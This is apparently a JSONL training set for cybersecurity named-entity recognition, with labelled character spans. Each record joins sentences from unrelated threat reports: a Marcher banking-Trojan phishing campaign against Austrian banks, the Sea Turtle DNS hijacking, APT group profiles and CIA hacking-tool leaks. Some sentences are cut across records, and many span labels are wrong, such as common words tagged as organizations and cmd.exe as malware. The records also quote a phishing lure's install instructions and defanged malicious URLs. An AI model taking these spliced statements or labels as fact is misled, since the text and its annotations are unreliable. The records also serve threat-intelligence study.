{"text": "However , Proofpoint researchers have recently observed phishing attacks that incorporate all of these elements in a single , multistep scheme involving the Marcher Android banking Trojan targeting customers of large Austrian banks . North Korean dictator Kim Jong Un has set ambitious economic goals , and some cybersecurity analysts have predicted he will unleash the Pyongyang-affiliated hackers to meet those deadlines by targeting multinational companies\u2019 trade secrets . Leafminer : Raspite .", "spans": [{"start": 10, "end": 20, "label": "Organization"}, {"start": 157, "end": 164, "label": "Malware"}, {"start": 370, "end": 398, "label": "Organization"}, {"start": 436, "end": 460, "label": "Organization"}, {"start": 477, "end": 486, "label": "Organization"}, {"start": 489, "end": 496, "label": "Organization"}]}
{"text": "Attacks involving Marcher have become increasingly sophisticated , with documented cases involving multiple attack vectors and a variety of targeted financial services and communication platforms [ 1 ] [ 2 ] . According to ClearSky , the suspected Lazarus operatives looked to leverage a vulnerability in outdated WinRAR file-archiving software that hackers have been exploiting since it was disclosed last month . Leafminer is an Iranian threat group that has targeted government organizations and business entities in the Middle East since at least early 2017 .", "spans": [{"start": 18, "end": 25, "label": "Malware"}, {"start": 223, "end": 231, "label": "Organization"}, {"start": 314, "end": 320, "label": "Malware"}, {"start": 415, "end": 424, "label": "Organization"}, {"start": 524, "end": 535, "label": "Organization"}]}
{"text": "In this case , a threat actor has been targeting customers of Bank Austria , Raiffeisen Meine Bank , and Sparkasse since at least January 2017 . This new Lotus Blossom campaign delivers a malicious RTF document posing as an ASEAN Defence Minister's Meeting (ADMM) directory (decoy) that also carries an executable (payload) embedded as an OLE object , the Elise backdoor . Elderwood : Elderwood Gang , Beijing Group , Sneaky Panda .", "spans": [{"start": 154, "end": 167, "label": "Organization"}, {"start": 373, "end": 382, "label": "Organization"}, {"start": 385, "end": 399, "label": "Organization"}, {"start": 402, "end": 415, "label": "Organization"}, {"start": 418, "end": 430, "label": "Organization"}]}
{"text": "The attacks described here begin with a banking credential phishing scheme , followed by an attempt to trick the victim into installing Marcher , and finally with attempts to steal credit card information by the banking Trojan itself . Just months after the APT32 watering hole activity against ASEAN-related websites was observed in Fall 2017 , this new activity clearly indicates the association (ASEAN) clearly remains a priority collection target in the region . Elderwood is a suspected Chinese cyber espionage group that was reportedly responsible for the 2009 Google intrusion known as Operation Aurora .", "spans": [{"start": 136, "end": 143, "label": "Malware"}, {"start": 258, "end": 263, "label": "Organization"}, {"start": 467, "end": 476, "label": "Organization"}, {"start": 567, "end": 573, "label": "Organization"}]}
{"text": "Analysis Marcher is frequently distributed via SMS , but in this case , victims are presented with a link in an email . Researchers implicated Lazarus Group because of digital clues including a malicious implant known as Rising Sun that has been attributed to the group . The group has targeted defense organizations , supply chain manufacturers , human rights and nongovernmental organizations ( NGOs ) , and IT service providers .", "spans": [{"start": 9, "end": 16, "label": "Malware"}, {"start": 120, "end": 131, "label": "Organization"}, {"start": 143, "end": 150, "label": "Organization"}, {"start": 194, "end": 211, "label": "System"}, {"start": 221, "end": 231, "label": "Organization"}, {"start": 295, "end": 316, "label": "Organization"}]}
{"text": "Oftentimes , the emailed link is a bit.ly shortened link , used to potentially evade detection . The attackers originally embedded an implant into the malicious document as a hypertext application (HTA) file , and then quickly moved to hide it in an image on a remote server and used obfuscated Visual Basic macros to launch the decoder script . Equation is a sophisticated threat group that employs multiple remote access tools .", "spans": [{"start": 101, "end": 110, "label": "Organization"}, {"start": 346, "end": 354, "label": "Organization"}, {"start": 409, "end": 428, "label": "Malware"}]}
{"text": "The link leads to a phishing page that asks for banking login credentials or an account number and PIN . Lazarus used the open-source tool Invoke-PSImage , released December 20 , to embed the PowerShell script into the image file . The group is known to use zero-day exploits and has developed the capability to overwrite the firmware of hard disk drives .", "spans": [{"start": 105, "end": 112, "label": "Organization"}, {"start": 139, "end": 153, "label": "System"}, {"start": 258, "end": 275, "label": "Vulnerability"}]}
{"text": "Figure 1 shows one such landing page using stolen branding from Bank Austria . Once the script runs , it passes the decoded script from the image file to the Windows command line in a variable $x , which uses cmd.exe to execute the obfuscated script and run it via PowerShell . FIN10 is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016 .", "spans": [{"start": 102, "end": 104, "label": "Organization"}, {"start": 209, "end": 216, "label": "Malware"}, {"start": 265, "end": 275, "label": "System"}, {"start": 278, "end": 283, "label": "Organization"}]}
{"text": "Figure 1 : Landing page for phishing scheme asking for the victim \u2019 s signatory number and PIN using stolen branding from Bank Austria Because the actor delivered phishing links using the bit.ly URL shortener , we can access delivery statistics for this particular campaign . The Department of Homeland Security (DHS) issued an alert about this activity on Jan. 24 2019 , warning that an attacker could redirect user traffic and obtain valid encryption certificates for an organization's domain names . The group uses stolen data exfiltrated from victims to extort organizations .", "spans": [{"start": 122, "end": 134, "label": "System"}, {"start": 188, "end": 194, "label": "Indicator"}, {"start": 312, "end": 317, "label": "Organization"}]}
{"text": "The link resolves to a URL designed to appear legitimate , with a canonical domain of sicher97140 [ . In the Sea Turtle campaign , Talos was able to identify two distinct groups of victims . Orangeworm is a group that has targeted organizations in the healthcare sector in the United States , Europe , and Asia since at least 2015 , likely for the purpose of corporate espionage .", "spans": [{"start": 86, "end": 101, "label": "Indicator"}, {"start": 131, "end": 136, "label": "Organization"}, {"start": 191, "end": 201, "label": "Organization"}]}
{"text": "] info including the \u201c bankaustria \u201d brand . The first group , we identify as primary victims , includes national security organizations , ministries of foreign affairs , and prominent energy organizations . Patchwork : Dropping Elephant , Chinastrats , MONSOON , Operation Hangover .", "spans": [{"start": 55, "end": 60, "label": "Organization"}, {"start": 105, "end": 136, "label": "Organization"}, {"start": 139, "end": 149, "label": "Organization"}, {"start": 175, "end": 205, "label": "Organization"}, {"start": 208, "end": 217, "label": "Organization"}, {"start": 220, "end": 237, "label": "Organization"}, {"start": 240, "end": 251, "label": "Organization"}, {"start": 254, "end": 261, "label": "Organization"}, {"start": 264, "end": 282, "label": "Organization"}]}
{"text": "Figure 2 : Bit.ly statistics for a phishing landing page targeting Bank Austria customers The actor appears to have recently begun using \u201c .top \u201d top-level domains ( TLDs ) for their phishing landing pages and have implemented a consistent naming structure as shown below . The threat actors behind the Sea Turtle campaign show clear signs of being highly capable and brazen in their endeavors . Patchwork is a cyberespionage group that was first observed in December 2015 .", "spans": [{"start": 11, "end": 17, "label": "Indicator"}, {"start": 67, "end": 79, "label": "System"}, {"start": 278, "end": 291, "label": "Organization"}, {"start": 396, "end": 405, "label": "Organization"}]}
{"text": "Earlier this year , the actor used \u201c .pw \u201d TLDs while the Bank Austria scheme highlighted above used \u201c .info \u201d . In most cases , threat actors typically stop or slow down their activities once their campaigns are publicly revealed . While the group has not been definitively attributed , circumstantial evidence suggests the group may be a pro-Indian or Indian entity .", "spans": [{"start": 58, "end": 70, "label": "System"}, {"start": 129, "end": 142, "label": "Organization"}]}
{"text": "Some recent campaigns against other bank customers also used \u201c .gdn \u201d TLDs . The threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space . Patchwork has been seen targeting industries related to diplomatic and government agencies .", "spans": [{"start": 81, "end": 94, "label": "Organization"}, {"start": 187, "end": 201, "label": "Malware"}, {"start": 255, "end": 264, "label": "Organization"}, {"start": 311, "end": 321, "label": "Organization"}, {"start": 326, "end": 345, "label": "Organization"}]}
{"text": "Other attacks on Bank Austria customers that we observed resolved to the following .top domains : Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817062 [ . If an attacker was able to compromise an organization's network administrator credentials , the attacker would be able to change that particular organization's DNS records at will . Much of the code used by this group was copied and pasted from online forums .", "spans": [{"start": 17, "end": 29, "label": "System"}, {"start": 112, "end": 156, "label": "Indicator"}, {"start": 163, "end": 171, "label": "Organization"}]}
{"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817461 [ . If the attackers were able to obtain one of these EPP keys , they would be able to modify any DNS records that were managed by that particular registrar . Patchwork was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018 .", "spans": [{"start": 21, "end": 65, "label": "Indicator"}, {"start": 73, "end": 82, "label": "Organization"}, {"start": 221, "end": 230, "label": "Organization"}]}
{"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817465 [ . Captured legitimate user credentials when users interacted with these actor - controlled servers . PittyTiger is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control .", "spans": [{"start": 21, "end": 65, "label": "Indicator"}, {"start": 136, "end": 141, "label": "Organization"}, {"start": 165, "end": 175, "label": "Organization"}]}
{"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817466 [ . The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals . Unknown .", "spans": [{"start": 21, "end": 65, "label": "Indicator"}, {"start": 133, "end": 143, "label": "Malware"}, {"start": 158, "end": 171, "label": "Malware"}]}
{"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817469 [ . As of early 2019 , the only evidence of the spear-phishing threat vector came from a compromised organization's public disclosure . Release_Time : unknow Report_URL : https://attack.mitre.org/groups/ APT19 \uff1a Codoso , C0d0so0 , Codoso Team , Sunshop Group .", "spans": [{"start": 21, "end": 65, "label": "Indicator"}, {"start": 125, "end": 138, "label": "Organization"}, {"start": 266, "end": 271, "label": "Organization"}, {"start": 274, "end": 280, "label": "Organization"}, {"start": 283, "end": 290, "label": "Organization"}, {"start": 293, "end": 304, "label": "Organization"}, {"start": 307, "end": 320, "label": "Organization"}]}
{"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id58712 [ . On January 4 , Packet Clearing House , which is not an Internet exchange point but rather is an NGO which provides support to Internet exchange points and the core of the domain name system , provided confirmation of this aspect of the actors\u2019 tactics when it publicly revealed its internal DNS had been briefly hijacked as a consequence of the compromise at its domain registrar . APT19 is a Chinese-based threat group that has targeted a variety of industries , including defense , finance , energy , pharmaceutical , telecommunications , high tech , education , manufacturing , and legal services .", "spans": [{"start": 21, "end": 63, "label": "Indicator"}, {"start": 300, "end": 307, "label": "Organization"}, {"start": 446, "end": 451, "label": "Organization"}]}
{"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id58717 [ . During a typical incident , the actor would modify the NS records for the targeted organization , pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries . In 2017 , a phishing campaign was used to target seven law and investment firms .", "spans": [{"start": 21, "end": 63, "label": "Indicator"}, {"start": 96, "end": 101, "label": "Organization"}]}
{"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id58729 [ . The next step for the actor was to build MitM servers that impersonated legitimate services to capture user credentials . Some analysts track APT19 S-APT and Deep Panda as the same group , but it is unclear from open source information if the groups are the same .", "spans": [{"start": 21, "end": 63, "label": "Indicator"}, {"start": 86, "end": 91, "label": "Organization"}, {"start": 105, "end": 117, "label": "System"}, {"start": 200, "end": 232, "label": "Organization"}]}
{"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id58729 [ . In addition to the MitM server IP addresses published in previous reports , Talos identified 16 additional servers leveraged by the actor during the observed attacks . APT28 : SNAKEMACKEREL , Swallowtail , Group 74 , Sednit , Sofacy , Pawn Storm , Fancy Bear , STRONTIUM , Tsar Team , Threat Group-4127 , TG-4127 .", "spans": [{"start": 21, "end": 63, "label": "Indicator"}, {"start": 83, "end": 94, "label": "System"}, {"start": 140, "end": 145, "label": "Organization"}, {"start": 160, "end": 178, "label": "System"}, {"start": 196, "end": 201, "label": "Organization"}, {"start": 232, "end": 237, "label": "Organization"}, {"start": 240, "end": 253, "label": "Organization"}, {"start": 256, "end": 267, "label": "Organization"}, {"start": 270, "end": 278, "label": "Organization"}, {"start": 281, "end": 287, "label": "Organization"}, {"start": 290, "end": 296, "label": "Organization"}, {"start": 299, "end": 309, "label": "Organization"}, {"start": 312, "end": 322, "label": "Organization"}, {"start": 325, "end": 334, "label": "Organization"}, {"start": 337, "end": 346, "label": "Organization"}, {"start": 349, "end": 366, "label": "Organization"}, {"start": 369, "end": 376, "label": "Organization"}]}
{"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id87721 [ . The attackers would then use the certificate on actor-controlled servers to perform additional MitM operations to harvest additional credentials . APT28 is a threat group that has been attributed to Russia's Main Intelligence Directorate of the Russian General Staff by a July 2018 U.S. Department of Justice indictment .", "spans": [{"start": 21, "end": 63, "label": "Indicator"}, {"start": 68, "end": 77, "label": "Organization"}, {"start": 159, "end": 163, "label": "System"}, {"start": 211, "end": 216, "label": "Organization"}, {"start": 263, "end": 330, "label": "Organization"}, {"start": 346, "end": 372, "label": "Organization"}]}
{"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id87726 [ . In some cases , the victims were redirected to these actor-controlled servers displaying the stolen certificate . This group reportedly compromised the Hillary Clinton campaign , the Democratic National Committee , and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election .", "spans": [{"start": 21, "end": 63, "label": "Indicator"}, {"start": 117, "end": 133, "label": "Organization"}, {"start": 134, "end": 141, "label": "System"}, {"start": 247, "end": 276, "label": "Organization"}, {"start": 287, "end": 330, "label": "Organization"}]}
{"text": "] top/ These permutations of TLDs and canonical domains incorporating the legitimate domain expected by the targeted banking customers exemplifies recent trends in social engineering by threat actors . One notable aspect of the campaign was the actors' ability to impersonate VPN applications , such as Cisco Adaptive Security Appliance (ASA) products , to perform MitM attacks . APT28 has been active since at least 2004 .", "spans": [{"start": 245, "end": 252, "label": "Organization"}, {"start": 276, "end": 292, "label": "System"}, {"start": 309, "end": 336, "label": "System"}, {"start": 380, "end": 385, "label": "Organization"}]}
{"text": "Just as threat actors may use stolen branding in their email lures to trick potential victims , they reproduce a legitimate domain name in a fraudulent domain that is not controlled by the bank . At this time , we do not believe that the attackers found a new ASA exploit . APT29 : YTTRIUM , The Dukes , Cozy Bear , CozyDuke .", "spans": [{"start": 211, "end": 213, "label": "Organization"}, {"start": 238, "end": 247, "label": "Organization"}, {"start": 260, "end": 263, "label": "Vulnerability"}, {"start": 264, "end": 271, "label": "Vulnerability"}, {"start": 274, "end": 279, "label": "Organization"}, {"start": 282, "end": 289, "label": "Organization"}, {"start": 292, "end": 301, "label": "Organization"}, {"start": 304, "end": 313, "label": "Organization"}, {"start": 316, "end": 324, "label": "Organization"}]}
{"text": "Once the victim enters their account information on the landing page , the phishing attack then requests that the user log in with their email address and phone number . Rather , they likely abused the trust relationship associated with the ASA's SSL certificate to harvest VPN credentials to gain remote access to the victim's network . APT29 is threat group that has been attributed to the Russian government and has operated since at least 2008 .", "spans": [{"start": 179, "end": 183, "label": "Organization"}, {"start": 241, "end": 246, "label": "System"}, {"start": 338, "end": 343, "label": "Organization"}, {"start": 392, "end": 410, "label": "Organization"}]}
{"text": "Figure 3 : Step two of the credential phish asking for the victim \u2019 s email address and phone number Having stolen the victim \u2019 s account and personal information , the scammer introduces a social engineering scheme , informing users that they currently do not have the \u201c Bank Austria Security App \u201d installed on their smartphone and must download it to proceed . As an example , DNS records indicate that a targeted domain resolved to an actor-controlled MitM server . This group reportedly compromised the Democratic National Committee starting in the summer of 2015 .", "spans": [{"start": 272, "end": 297, "label": "System"}, {"start": 439, "end": 455, "label": "Organization"}, {"start": 456, "end": 467, "label": "System"}, {"start": 508, "end": 537, "label": "Organization"}]}
{"text": "Figure 4 shows the download prompt for this fake app ; an English translation follows . In another case , the attackers were able to compromise NetNod , a non-profit , independent internet infrastructure organization based in Sweden . PLATINUM is an activity group that has targeted victims since at least 2009 .", "spans": [{"start": 110, "end": 119, "label": "Organization"}, {"start": 235, "end": 243, "label": "Organization"}]}
{"text": "Figure 4 : Alert prompting the victim to download an Android banking app ( English translation below ) , with stolen branding and fraudulent copy * * * Translation * * * Dear Customer , The system has detected that the Bank Austria Security App is not installed on your smartphone . Using this access , the threat actors were able to manipulate the DNS records for sa1[.]dnsnode[.]net . The group has focused on targets associated with governments and related organizations in South and Southeast Asia .", "spans": [{"start": 53, "end": 72, "label": "System"}, {"start": 219, "end": 244, "label": "System"}, {"start": 314, "end": 320, "label": "Organization"}, {"start": 436, "end": 447, "label": "Organization"}, {"start": 460, "end": 473, "label": "Organization"}]}
{"text": "Due to new EU money laundering guidelines , the new Bank Austria security app is mandatory for all customers who have a mobile phone number in our system . This redirection allowed the attackers to harvest credentials of administrators who manage domains with the TLD of Saudi Arabia (.sa) . Poseidon Group is a Portuguese-speaking threat group that has been active since at least 2005 .", "spans": [{"start": 11, "end": 13, "label": "Organization"}, {"start": 52, "end": 77, "label": "System"}, {"start": 185, "end": 194, "label": "Organization"}, {"start": 292, "end": 306, "label": "Organization"}]}
{"text": "Please install the app immediately to avoid blocking your account . In one of the more recent campaigns on March 27 , 2019 , the threat actors targeted the Sweden-based consulting firm Cafax . The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the Poseidon Group as a security firm .", "spans": [{"start": 129, "end": 142, "label": "Organization"}, {"start": 185, "end": 190, "label": "Organization"}, {"start": 314, "end": 328, "label": "Organization"}]}
{"text": "Follow the instructions at the bottom of this page . We assess with high confidence that Sea Turtle was targeted in an attempt to re-establish access to the NetNod network , which was previously compromised by this threat actor . PROMETHIUM is an activity group that has been active since at least 2012 .", "spans": [{"start": 157, "end": 163, "label": "Organization"}, {"start": 215, "end": 227, "label": "Organization"}, {"start": 230, "end": 240, "label": "Organization"}]}
{"text": "Why you need the Bank Austria Security App : Due to outdated technology of the mobile network important data such as mTan SMS and online banking connections are transmitted unencrypted . Obtaining access to this ccTLD registrars would have allowed attackers to hijack any domain that used those ccTLDs . The group conducted a campaign in May 2016 and has heavily targeted Turkish victims .", "spans": [{"start": 17, "end": 42, "label": "System"}, {"start": 248, "end": 257, "label": "Organization"}]}
{"text": "Our security app allows us to transmit this sensitive data encrypted to you , thus increasing the security that you will not suffer any financial loss . These actors perform DNS hijacking through the use of actor-controlled name servers . PROMETHIUM has demonstrated similarity to another activity group called NEODYMIUM due to overlapping victim and campaign characteristics .", "spans": [{"start": 159, "end": 165, "label": "Organization"}, {"start": 224, "end": 236, "label": "System"}, {"start": 239, "end": 249, "label": "Organization"}, {"start": 311, "end": 320, "label": "Organization"}]}
{"text": "Step 1 : Download Bank Austria Security App Download the Bank Austria security app to your Android device . Sea Turtle have been more aggressive in their pursuit targeting DNS registries and a number of registrars , including those that manage ccTLDs . APT33 Elfin APT33 is a suspected Iranian threat group that has carried out operations since at least 2013 .", "spans": [{"start": 18, "end": 43, "label": "System"}, {"start": 108, "end": 118, "label": "Organization"}, {"start": 172, "end": 186, "label": "Organization"}, {"start": 193, "end": 213, "label": "Organization"}, {"start": 253, "end": 258, "label": "Organization"}, {"start": 259, "end": 264, "label": "Organization"}, {"start": 265, "end": 270, "label": "Organization"}]}
{"text": "To do this , open the displayed link on your mobile phone by typing in the URL field of your browser or scan the displayed QR code . These actors use Let's Encrypts , Comodo , Sectigo , and self-signed certificates in their MitM servers to gain the initial round of credentials . The group has targeted organizations across multiple industries in the United States , Saudi Arabia , and South Korea , with a particular interest in the aviation and energy sectors .", "spans": [{"start": 139, "end": 145, "label": "Organization"}, {"start": 156, "end": 164, "label": "System"}, {"start": 167, "end": 173, "label": "System"}, {"start": 176, "end": 183, "label": "System"}, {"start": 190, "end": 214, "label": "System"}, {"start": 224, "end": 236, "label": "System"}]}
{"text": "* * * End translation * * * The phishing template then presents additional instructions for installing the fake security application ( Figure 5 ) : Figure 5 : Additional instructions telling the victim to give the app the requested permissions ( English translation below ) , with stolen branding and fraudulent copy * * * Translation * * * Step 2 : Allow installation Open your device 's settings , select Security or Applications ( depending on the device ) , and check Unknown sources . These actors have been more aggressive in their pursuit targeting DNS registries and a number of registrars , including those that manage ccTLDs . APT37 ScarCruft , Reaper , Group123 , TEMP.Reaper APT37 is a suspected North Korean cyber espionage group that has been active since at least 2012 .", "spans": [{"start": 496, "end": 502, "label": "Organization"}, {"start": 621, "end": 627, "label": "Organization"}, {"start": 628, "end": 634, "label": "Organization"}, {"start": 637, "end": 642, "label": "Organization"}, {"start": 643, "end": 652, "label": "Organization"}, {"start": 655, "end": 661, "label": "Organization"}, {"start": 664, "end": 672, "label": "Organization"}, {"start": 675, "end": 686, "label": "Organization"}, {"start": 687, "end": 692, "label": "Organization"}]}
{"text": "Step 3 : Run installation Start the Bank Austria security app from the notifications or your download folder , tap Install . Once they have access to the network , they steal the organization's legitimate SSL certificate and use it on actor-controlled servers . The group has targeted victims primarily in South Korea , but also in Japan , Vietnam , Russia , Nepal , China , India , Romania , Kuwait , and other parts of the Middle East .", "spans": [{"start": 36, "end": 61, "label": "System"}, {"start": 164, "end": 168, "label": "Organization"}, {"start": 235, "end": 251, "label": "System"}, {"start": 252, "end": 259, "label": "System"}]}
{"text": "After successful installation , tap Open and enable the device administrator . We believe that the Sea Turtle campaign continues to be highly successful for several reasons . APT37 has also been linked to following campaigns between 2016-2018 : Operation Daybreak , Operation Erebus , Golden Time , Evil New Year , Are you Happy? , FreeMilk , Northern Korean Human Rights , and Evil New Year 2018 .", "spans": [{"start": 79, "end": 81, "label": "Organization"}, {"start": 175, "end": 180, "label": "Organization"}]}
{"text": "Finished ! Had more ccTLDs implemented security features such as registrar locks , attackers would be unable to redirect the targeted domains . APT38 APT38 is a financially-motivated threat group that is backed by the North Korean regime .", "spans": [{"start": 83, "end": 92, "label": "Organization"}, {"start": 144, "end": 149, "label": "Organization"}, {"start": 150, "end": 155, "label": "Organization"}]}
{"text": "* * * End translation * * * Referring again to bit.ly , we can see click statistics for this campaign ( Figure 6 ) . The attackers stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials , allowing the actors to gain access to the targeted network . The group mainly targets banks and financial institutions and has targeted more than 16 organizations in at least 13 countries since at least 2014 . APT3 : Gothic Panda , Pirpi , UPS Team , Buckeye , Threat Group-0110 , TG-0110 .", "spans": [{"start": 47, "end": 53, "label": "Indicator"}, {"start": 121, "end": 130, "label": "Organization"}, {"start": 213, "end": 216, "label": "System"}, {"start": 455, "end": 459, "label": "Organization"}, {"start": 462, "end": 474, "label": "Organization"}, {"start": 477, "end": 482, "label": "Organization"}, {"start": 485, "end": 493, "label": "Organization"}, {"start": 496, "end": 503, "label": "Organization"}, {"start": 506, "end": 523, "label": "Organization"}, {"start": 526, "end": 533, "label": "Organization"}]}
{"text": "Figure 6 : bit.ly statistics for the fake Bank Austria Android app download link From this small sample , we see that 7 % of visitors clicked through to download the application , which is actually a version of the Marcher banking Trojan named \u201c BankAustria.apk \u201d , continuing the fraudulent use of the bank \u2019 s branding to fool potential victims . The threat actors were able to maintain long term persistent access to many of these networks by utilizing compromised credentials . APT3 is a China based threat group that researchers have attributed to China's Ministry of StateSecurity .", "spans": [{"start": 11, "end": 17, "label": "Indicator"}, {"start": 42, "end": 66, "label": "System"}, {"start": 215, "end": 237, "label": "Malware"}, {"start": 246, "end": 261, "label": "Indicator"}, {"start": 353, "end": 366, "label": "Organization"}, {"start": 482, "end": 486, "label": "Organization"}, {"start": 553, "end": 586, "label": "Organization"}]}
{"text": "This sample is similar to those presented in other recent Marcher analyses [ 1 ] [ 2 ] . Cisco Talos will continue to monitor Sea Turtle and work with our partners to understand the threat as it continues to evolve to ensure that our customers remain protected and the public is informed . This group is responsible for the campaigns known as Operation Clandestine Fox , Operation Clandestine Wolf , and Operation Double Tap .", "spans": [{"start": 58, "end": 65, "label": "Malware"}, {"start": 89, "end": 100, "label": "Organization"}]}
{"text": "This particular application is signed with a fake certificate : Owner : CN=Unknown , OU=Unknown , O=Unknown , L=Unknown , ST=Unknown , C=Unknown Issuer CN=Unknown , OU=Unknown , O=Unknown , L=Unknown , ST=Unknown , C=Unknown Serial : 1c9157d7 Validity : 11/02/2017 00:16:46 03/20/2045 00:16:46 MD5 Hash : A8:55:46:32:15 If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file . As of June 2015 , the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong .", "spans": [{"start": 305, "end": 319, "label": "Indicator"}, {"start": 358, "end": 367, "label": "System"}, {"start": 370, "end": 372, "label": "Malware"}, {"start": 383, "end": 409, "label": "Malware"}]}
{"text": ": A9 : D5:95 : A9:91 : C2:91:77:5D:30 : F6 SHA1 Hash : 32:17 : E9:7E:06 : FE:5D:84 : BE:7C:14:0C : C6:2B:12:85 : E7:03:9A:5F The app requests extensive permissions during installation that enable a range of activities supported by the malware . Create a link file in the startup folder for AutoHotkeyU32.exe , allowing the attack to persist even after a system restart . MITRE has also developed an APT3 Adversary Emulation Plan .", "spans": [{"start": 55, "end": 124, "label": "Indicator"}, {"start": 254, "end": 263, "label": "Malware"}, {"start": 290, "end": 307, "label": "Malware"}, {"start": 371, "end": 376, "label": "Organization"}, {"start": 399, "end": 403, "label": "Organization"}]}
{"text": "Those permission shown in bold below are the most problematic : Allows an application to write to external storage . More importantly , one of these files also enables the download of TeamViewer , a remote access tool that gives threat actors remote control over the system . APT30 is a threat group suspected to be associated with the Chinese government .", "spans": [{"start": 184, "end": 194, "label": "System"}, {"start": 229, "end": 242, "label": "Organization"}, {"start": 276, "end": 281, "label": "Organization"}, {"start": 336, "end": 354, "label": "Organization"}]}
{"text": "Allows an application to read from external storage . Such attacks highlight the need for caution before downloading files from unknown sources and enabling macro for files from unknown sources . While Naikon shares some characteristics with APT30 , the two groups do not appear to be exact matches .", "spans": [{"start": 59, "end": 66, "label": "Malware"}, {"start": 202, "end": 208, "label": "Organization"}, {"start": 242, "end": 247, "label": "Organization"}]}
{"text": "Allows an application to use SIP service . The agency's hacking division freed it from having to disclose its often controversial operations to the NSA (its primary bureaucratic rival) in order to draw on the NSA's hacking capacities . APT32 : SeaLotus , OceanLotus , APT-C-00 .", "spans": [{"start": 56, "end": 72, "label": "Organization"}, {"start": 148, "end": 151, "label": "Organization"}, {"start": 236, "end": 241, "label": "Organization"}, {"start": 244, "end": 252, "label": "Organization"}, {"start": 255, "end": 265, "label": "Organization"}, {"start": 268, "end": 276, "label": "Organization"}]}
{"text": "Allows an application to collect battery statistics Allows an app to access precise location . By the end of 2016 , the CIA's hacking division , which formally falls under the agency's Center for Cyber Intelligence (CCI) , had over 5000 registered users and had produced more than a thousand hacking systems , trojans , viruses , and other weaponized malware . APT32 is a threat group that has been active since at least 2014 .", "spans": [{"start": 120, "end": 142, "label": "Organization"}, {"start": 292, "end": 307, "label": "System"}, {"start": 310, "end": 317, "label": "System"}, {"start": 320, "end": 327, "label": "System"}, {"start": 340, "end": 358, "label": "System"}, {"start": 361, "end": 366, "label": "Organization"}]}
{"text": "Allows an application to receive SMS messages . Such is the scale of the CIA's undertaking that by 2016 , its hackers had utilized more code than that used to run Facebook . The group has targeted multiple private sector industries as well as with foreign governments , dissidents , and journalists with a strong focus on Southeast Asian countries like Vietnam , the Philippines , Laos , and Cambodia .", "spans": [{"start": 110, "end": 117, "label": "Organization"}]}
{"text": "Allows an application to send SMS messages . Wikileaks has carefully reviewed the Year Zero disclosure and published substantive CIA documentation while avoiding the distribution of 'armed' cyberweapons until a consensus emerges on the technical and political nature of the CIA's program and how such 'weapons' should analyzed , disarmed and published . They have extensively used strategic web compromises to compromise victims .", "spans": [{"start": 45, "end": 54, "label": "Organization"}, {"start": 129, "end": 132, "label": "Organization"}, {"start": 381, "end": 406, "label": "System"}]}
{"text": "Allows an application to read SMS messages . These redactions include ten of thousands of CIA targets and attack machines throughout Latin America , Europe and the United States . The group is believed to be Vietnam based .", "spans": [{"start": 90, "end": 93, "label": "Organization"}]}
{"text": "Allows an application to write SMS messages . The increasing sophistication of surveillance techniques has drawn comparisons with George Orwell's 1984 , but Weeping Angel , developed by the CIA's Embedded Devices Branch (EDB) , which infests smart TVs , transforming them into covert microphones , is surely its most emblematic realization . FIN7 : Carbanak Group .", "spans": [{"start": 157, "end": 170, "label": "System"}, {"start": 190, "end": 195, "label": "Organization"}, {"start": 242, "end": 251, "label": "System"}, {"start": 254, "end": 266, "label": "Malware"}, {"start": 342, "end": 346, "label": "Organization"}, {"start": 349, "end": 363, "label": "Organization"}]}
{"text": "Allows an application to initiate a phone call without going through the Dialer user interface for the user to confirm the call . After infestation , Weeping Angel places the target TV in a 'Fake-Off' mode , so that the owner falsely believes the TV is off when it is on . FIN7 is a financially-motivated threat group that has primarily targeted the U.S. retail , restaurant , and hospitality sectors since mid-2015 .", "spans": [{"start": 150, "end": 163, "label": "Organization"}, {"start": 273, "end": 277, "label": "Organization"}]}
{"text": "Allows applications to access information about networks . As of October 2014 the CIA was also looking at infecting the vehicle control systems used by modern cars and trucks . They often use point-of-sale malware .", "spans": [{"start": 82, "end": 85, "label": "Organization"}, {"start": 192, "end": 205, "label": "System"}]}
{"text": "Allows applications to open network sockets . The CIA's Mobile Devices Branch (MDB) developed numerous attacks to remotely hack and control popular smart phones . A portion of FIN7 was run out of a front company called Combi Security .", "spans": [{"start": 50, "end": 55, "label": "Organization"}, {"start": 176, "end": 180, "label": "Organization"}, {"start": 219, "end": 233, "label": "Organization"}]}
{"text": "Allows an application to read the user 's contacts data . Despite iPhone's minority share (14.5%) of the global smart phone market in 2016 , a specialized unit in the CIA's Mobile Development Branch produces malware to infest , control and exfiltrate data from iPhones and other Apple products running iOS , such as iPads . FIN7 is sometimes referred to as Carbanak Group , but these appear to be two groups using the same Carbanak malware and are therefore tracked separately .", "spans": [{"start": 167, "end": 172, "label": "Organization"}, {"start": 261, "end": 268, "label": "System"}, {"start": 279, "end": 284, "label": "System"}, {"start": 302, "end": 305, "label": "System"}, {"start": 316, "end": 321, "label": "System"}, {"start": 324, "end": 328, "label": "Organization"}, {"start": 357, "end": 371, "label": "Organization"}, {"start": 423, "end": 431, "label": "Malware"}]}
